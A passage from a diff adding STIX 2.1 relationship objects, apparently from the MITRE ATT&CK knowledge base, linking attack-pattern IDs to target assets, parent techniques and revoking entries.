"identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.749Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--42e8de7b-37b2-4258-905a-6897815e58e0", + "target_ref": "x-mitre-asset--0804f037-a3b9-4715-98e1-9f73d19d6945", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--8ab253ed-9bf8-4e0d-b367-f9d5349a7cfc", + "created": "2020-10-02T15:49:03.913Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-04-25T14:00:00.188Z", + "relationship_type": "subtechnique-of", + "source_ref": "attack-pattern--34ab90a3-05f6-4259-8f21-621081fdaba5", + "target_ref": "attack-pattern--9d48cab2-7929-4812-ad22-f536665f0109", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--8afab744-271f-4e39-90e4-d2db54150634", + "created": "2024-06-21T14:12:20.257Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-06-21T14:12:20.257Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--38eb0c22-6caf-46ce-8869-5964bd735858", + "target_ref": "x-mitre-asset--37fd65ed-2f82-4b94-9f70-5540d4fe6866", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--8b023cfe-ef21-40f3-8235-29925b60b9bb", + "created": "2024-06-21T14:12:20.265Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-06-21T14:12:20.265Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--0a5231ec-41af-4a35-83d0-6bdf11f28c65", + "target_ref": "x-mitre-asset--5029a500-3fc9-49db-825f-932ac0fc21ad", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--8b1052d2-f265-4258-9ecd-cfa576288029", + "created": "2024-07-02T13:55:55.766Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.766Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--9efb1ea7-c37b-4595-9640-b7680cd84279", + "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--8b14f023-d5cd-466a-89a5-b94512d64e3a", + "created": "2024-06-21T14:12:20.277Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-06-21T14:12:20.277Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--f5bb433e-bdf6-4781-84bc-35e97e43be89", + "target_ref": "x-mitre-asset--5029a500-3fc9-49db-825f-932ac0fc21ad", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--8b23f110-1e7b-4f68-8ceb-5776995f25e7", + "created": "2024-06-21T14:12:20.276Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-06-21T14:12:20.276Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--e4dc8c01-417f-458d-9ee0-bb0617c1b391", + "target_ref": "x-mitre-asset--5029a500-3fc9-49db-825f-932ac0fc21ad", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--8b25ea09-e9d5-45f1-b9ae-5b3f0fb00308", + "created": "2024-06-26T15:35:17.985Z", + "created_by_ref": "identity--c9819289-ba54-424a-b869-e4387b5f51b0", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-06-26T15:35:17.985Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--9c306d8d-cde7-4b4c-b6e8-d0bb16caca36", + "target_ref": "x-mitre-asset--8a455821-6e6e-49b0-9b6d-ac01011263c1", + "x_mitre_modified_by_ref": "identity--c9819289-ba54-424a-b869-e4387b5f51b0", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--8b5b1096-80f7-43dd-a881-af92beac20f9", + "created": "2020-06-29T15:36:41.688Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-04-25T14:00:00.188Z", + "relationship_type": "subtechnique-of", + "source_ref": "attack-pattern--b5327dd1-6bf9-4785-a199-25bcbd1f4a9d", + "target_ref": "attack-pattern--22905430-4901-4c2a-84f6-98243cb173f8", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--8b66ef05-63ad-4b12-b6b3-9a44475d781c", + "created": "2020-06-16T18:42:20.836Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-04-25T14:00:00.188Z", + "relationship_type": "subtechnique-of", + "source_ref": "attack-pattern--0708ae90-d0eb-4938-9a76-d0fc94f6eec1", + "target_ref": "attack-pattern--144e007b-e638-431d-a894-45d90c54ab90", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--8b862a31-b065-4d0d-afed-ded7005ee61b", + "created": "2024-07-02T13:55:55.763Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.763Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--1c4e5d32-1fe9-4116-9d9d-59e3925bd6a2", + "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--8b86fa49-6d13-42b4-bd48-814abfd6793f", + "created": "2020-06-24T12:42:35.464Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-04-25T14:00:00.188Z", + "relationship_type": "subtechnique-of", + "source_ref": "attack-pattern--6b57dc31-b814-4a03-8706-28bc20d739c4", + "target_ref": "attack-pattern--a10641f4-87b4-45a3-a906-92a149cb2c27", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--8b901b4d-0cde-438d-aea3-724c8e618659", + "created": "2024-07-02T13:55:55.750Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.750Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--bd5b58a4-a52d-4a29-bc0d-3f1d3968eb6b", + "target_ref": "x-mitre-asset--0804f037-a3b9-4715-98e1-9f73d19d6945", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--8bb52769-26d1-48f2-b8d8-f70a579c694e", + "created": "2024-07-02T13:55:55.770Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.770Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--64196062-5210-42c3-9a02-563a0d1797ef", + "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--8bb658a4-47b3-4181-9503-b3b77132bcbe", + "created": "2024-05-22T17:21:43.024Z", + "created_by_ref": "identity--c372c93e-faf6-4269-9ca9-90dff6035730", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-05-28T02:51:06.422Z", + "description": "Asset Mapping Rationale: Adversaries with no prior knowledge of legitimate credentials within the system or environment may guess passwords to attempt access to accounts. Typically, management services over commonly used ports are used when guessing passwords.", + "relationship_type": "targets", + "source_ref": "attack-pattern--09c4c11e-4fa1-4f8c-8dad-3cf8e69ad119", + "target_ref": "x-mitre-asset--dcb1d1c1-b195-45bf-b4cf-5b98c5b859a5", + "x_mitre_modified_by_ref": "identity--c372c93e-faf6-4269-9ca9-90dff6035730", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--8bc965af-3728-433d-bd6e-728bef2684eb", + "created": "2024-06-21T14:12:20.255Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-06-21T14:12:20.255Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--0c2d00da-7742-49e7-9928-4514e5075d32", + "target_ref": "x-mitre-asset--37fd65ed-2f82-4b94-9f70-5540d4fe6866", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--8bcaac7c-46c8-459a-a55c-b1e218c62cfc", + "created": "2020-01-24T15:15:44.235Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-04-25T14:00:00.188Z", + "relationship_type": "revoked-by", + "source_ref": "attack-pattern--d376668f-b208-42de-b1f5-fdfe0ad4b753", + "target_ref": "attack-pattern--9c45eaa3-8604-4780-8988-b5074dbb9ecd", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--8bcc4b82-d25f-49ce-a4f2-967994ae21de", + "created": "2020-02-18T18:34:49.737Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-04-25T14:00:00.188Z", + "relationship_type": "subtechnique-of", + "source_ref": "attack-pattern--b7dc639b-24cd-482d-a7f1-8897eda21023", + "target_ref": "attack-pattern--dcaa092b-7de9-4a21-977f-7fcb77e89c48", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--8be10d07-69bd-47ae-9dea-5918d1005699", + "created": "2020-01-14T17:23:05.953Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-04-25T14:00:00.188Z", + "relationship_type": "revoked-by", + "source_ref": "attack-pattern--52f3d5a6-8a0f-4f82-977e-750abf90d0b0", + "target_ref": "attack-pattern--0042a9f5-f053-4769-b3ef-9ad018dfa298", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--8bfeed6a-a0c6-4f11-81b2-f32225c85ac4", + "created": "2023-10-02T20:21:16.665Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-10-02T20:21:16.665Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--c9a8d958-fcdb-40d2-af4c-461c8031651a", + "target_ref": "x-mitre-asset--2b676abd-8263-49ea-81a4-78a7e1f776fe", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--8c569c9c-a71d-4789-abb2-302a3c402af5", + "created": "2024-07-02T13:55:55.770Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.770Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--9c99724c-a483-4d60-ad9d-7f004e42e8e8", + "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--8c5b2f84-21ca-4d89-ad55-1cb02a02fb22", + "created": "2024-07-02T13:55:55.763Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.763Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--0a3ead4e-6d47-4ccb-854c-a6a4f9d96b22", + "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--8c5d3147-6f62-4961-bd3b-018ec8f46e98", + "created": "2024-07-02T13:55:55.764Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.764Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--3f886f2a-874f-4333-b794-aa6075009b1c", + "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--8c7f19e8-d27e-49b4-86f9-58030c79fee1", + "created": "2024-07-02T13:55:55.756Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.756Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--acd0ba37-7ba9-4cc5-ac61-796586cd856d", + "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--8c8c8e2b-a654-4ae5-97c6-f7f210aa6b14", + "created": "2024-07-02T13:55:55.767Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.767Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--da051493-ae9c-4b1b-9760-c009c46c9b56", + "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--8c9a2e8c-34a5-4ab1-bc5f-bee3e58b2548", + "created": "2024-06-21T14:12:20.259Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-06-21T14:12:20.259Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--69b8fd78-40e8-4600-ae4d-662c9d7afdb3", + "target_ref": "x-mitre-asset--37fd65ed-2f82-4b94-9f70-5540d4fe6866", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--8c9aa081-0e56-4f57-a54e-6decf6aab819", + "created": "2021-11-19T14:13:11.473Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-05-24T14:00:00.188Z", + "relationship_type": "subtechnique-of", + "source_ref": "attack-pattern--ffe59ad3-ad9b-4b9f-b74f-5beb3c309dc1", + "target_ref": "attack-pattern--22905430-4901-4c2a-84f6-98243cb173f8", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--8c9e2078-a01f-48f9-8bd3-e8c88de2cb7a", + "created": "2024-07-02T13:55:55.751Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.751Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--c1b68a96-3c48-49ea-a6c0-9b27359f9c19", + "target_ref": "x-mitre-asset--0804f037-a3b9-4715-98e1-9f73d19d6945", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--8ccd5f5c-420a-413b-81ef-5e40f401be95", + "created": "2023-09-28T20:31:46.082Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-09-28T20:31:46.082Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--cd2c76a4-5e23-4ca5-9c40-d5e0604f7101", + "target_ref": "x-mitre-asset--75f810ad-b678-4c57-b93b-fdc79bba0c04", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--8ccf5cfb-df98-44e0-afb7-6e2d6c699944", + "created": "2020-02-12T18:57:58.597Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-04-25T14:00:00.188Z", + "relationship_type": "revoked-by", + "source_ref": "attack-pattern--4579d9c9-d5b9-45e0-9848-0104637b579f", + "target_ref": "attack-pattern--58a3e6aa-4453-4cc8-a51f-4befe80b31a8", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--8ce72c6c-58c6-4143-ab0c-cc245d0894a2", + "created": "2024-06-21T14:12:20.277Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-06-21T14:12:20.277Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--f7c0689c-4dbd-489b-81be-7cb7c7079ade", + "target_ref": "x-mitre-asset--5029a500-3fc9-49db-825f-932ac0fc21ad", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--8d16224f-18f5-4825-a978-fc69f7c91fd4", + "created": "2024-07-02T13:55:55.755Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.755Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--830c9528-df21-472c-8c14-a036bf17d665", + "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--8d2c3989-1b2f-4620-9315-3ef02c781679", + "created": "2020-11-23T15:35:53.894Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-04-25T14:00:00.188Z", + "relationship_type": "subtechnique-of", + "source_ref": "attack-pattern--d336b553-5da9-46ca-98a8-0b23f49fb447", + "target_ref": "attack-pattern--3fc9b85a-2862-4363-a64d-d692e3ffbee0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--8d33ef8b-e3f1-49e7-b5cf-ed40fc099ae2", + "created": "2024-07-02T13:55:55.764Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.764Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--359b00ad-9425-420b-bba5-6de8d600cbc0", + "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--8d36700e-3251-49e2-a5f1-c8fad483d1dc", + "created": "2024-07-02T13:55:55.754Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.754Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--68a0c5ed-bee2-4513-830d-5b0d650139bd", + "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--8d403e65-4c96-424e-9bb9-3a2eb6d66af5", + "created": "2020-03-10T18:26:56.478Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-04-25T14:00:00.188Z", + "relationship_type": "subtechnique-of", + "source_ref": "attack-pattern--810aa4ad-61c9-49cb-993f-daa06199421d", + "target_ref": "attack-pattern--d157f9d2-d09a-4efa-bb2a-64963f94e253", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--8d4f90a0-6315-4431-8968-dce7d94ae14b", + "created": "2024-07-02T13:55:55.760Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.760Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--79a4052e-1a89-4b09-aea6-51f1d11fe19c", + "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--8d5a5b8c-48a3-4d1c-bb39-89fd4a03bd15", + "created": "2020-01-24T13:40:47.476Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-04-25T14:00:00.188Z", + "relationship_type": "subtechnique-of", + "source_ref": "attack-pattern--98034fef-d9fb-4667-8dc4-2eab6231724c", + "target_ref": "attack-pattern--b6301b64-ef57-4cce-bb0b-77026f14a8db", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--8d5b2fe4-24c5-4a07-a1b0-8d1bac21af69", + "created": "2020-01-31T18:59:59.399Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [], + "object_marking_refs": [ + 